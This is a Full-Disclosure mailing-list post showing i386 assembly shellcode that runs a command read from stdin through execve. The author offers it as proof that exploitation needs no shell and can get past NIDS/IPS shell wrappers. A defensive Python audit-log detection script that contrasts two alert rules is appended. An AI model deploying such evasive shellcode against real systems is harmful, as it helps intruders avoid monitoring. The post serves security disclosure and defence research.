
Re: [Full-Disclosure] No shell => secure?



Hello Srs.!

We don't need a shell. A shellcode uses system calls
and the shellcode can be the shell.

See the following code:

-------------- noshell.s --------------
# Assembly example that simulates a shell.
# Without using any shell, it is the shell. :)
# Nash Leon - nashleon@xxxxxxxxxxxx
#
# Note: it only takes a filename of 7 bytes.

_start:

# read(0,buffer,20)
xorl %ebx, %ebx            # fd 0 (stdin)
movl $3, %eax              # read
leal -20(%esp),%ecx        # buffer just below the stack pointer
movl $20, %edx
int $0x80


# execve(buffer)
pushl %ecx
popl   %esi                # %esi = buffer
movl   %esi,0x8(%esi)      # argv[0] = buffer
movb   $0x0,0x7(%esi)      # NUL-terminate the 7-byte path
movl   $0x0,0xc(%esi)      # argv[1] = NULL
movl   $0xb,%eax           # execve
movl   %esi,%ebx           # path
leal   0x8(%esi),%ecx      # argv
#leal   0xc(%esi),%edx
movl $0x0, %edx            # envp = NULL
int    $0x80


# exit()
movl $0x1, %eax
xorl %ebx, %ebx
int $0x80
---------------------------------------

This source uses read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that it is possible to create
a shellcode that executes commands without
using a shell (/bin/bash, sh, zsh, tcsh, etc.).

It is useful when a NIDS/IPS interacts with
a shell wrapper, waiting for a string in the
interface, capturing an attack.

In this sample, only 7 bytes are permitted
as the path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048074

$ ./noshell
/bin/ls
noshell  noshell.o  noshell.s

So, Mrs. A shell is not necessary to exploit
a system. A NIDS/IPS can use a wrapper on the system
call execve() for security, but it is still possible
to break this resource.

Sorry for my poor English.

Best regards,

Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
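
A detection-side illustration of the point made in the message above, added here and not part of the original post: a rule that only matches shell names misses a direct execve() such as the `/bin/ls` run shown, while a rule keyed on the syscall itself catches it. The audit records, the service uid 33 and the allowlist are constructed assumptions.

```python
import re

# Constructed auditd-style SYSCALL records (not real logs). arch=40000003 is
# i386, where execve is syscall 11 (the $0xb loaded into %eax in noshell.s).
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1100000000.101:41): arch=40000003 syscall=11 success=yes exit=0 ppid=812 pid=901 uid=33 comm="sh" exe="/bin/sh"
type=SYSCALL msg=audit(1100000000.202:42): arch=40000003 syscall=11 success=yes exit=0 ppid=812 pid=902 uid=33 comm="ls" exe="/bin/ls"
type=SYSCALL msg=audit(1100000000.303:43): arch=40000003 syscall=3 success=yes exit=8 ppid=1 pid=812 uid=33 comm="httpd" exe="/usr/sbin/httpd"
type=SYSCALL msg=audit(1100000000.404:44): arch=40000003 syscall=11 success=yes exit=0 ppid=1 pid=950 uid=33 comm="rotatelogs" exe="/usr/sbin/rotatelogs"
type=SYSCALL msg=audit(1100000000.505:45): arch=40000003 syscall=11 success=yes exit=0 ppid=700 pid=960 uid=1000 comm="ls" exe="/bin/ls"
"""

EXECVE_NR = {"40000003": 11, "c000003e": 59}     # i386, x86_64
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/bin/tcsh"}
SERVICE_UIDS = {"33"}                            # assumption: network service account
ALLOWED_EXEC = {"/usr/sbin/rotatelogs"}          # assumption: helpers the service may run
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line):
    """Split one audit record into a key -> value dict, dropping quotes."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def execve_events(log):
    """Yield successful execve records, identified by arch + syscall number."""
    for line in log.splitlines():
        rec = parse(line)
        if rec.get("type") != "SYSCALL" or rec.get("success") != "yes":
            continue
        if EXECVE_NR.get(rec.get("arch")) == int(rec.get("syscall", -1)):
            yield rec


def shell_name_rule(log):
    """Naive rule: alert only when the executed program is a known shell."""
    return [r["pid"] for r in execve_events(log) if r["exe"] in SHELLS]


def service_exec_rule(log):
    """Alert on any execve by a service account outside its allowlist."""
    return [r["pid"] for r in execve_events(log)
            if r["uid"] in SERVICE_UIDS and r["exe"] not in ALLOWED_EXEC]


if __name__ == "__main__":
    print("shell-name rule:", shell_name_rule(SAMPLE_LOG))
    print("service-exec rule:", service_exec_rule(SAMPLE_LOG))
```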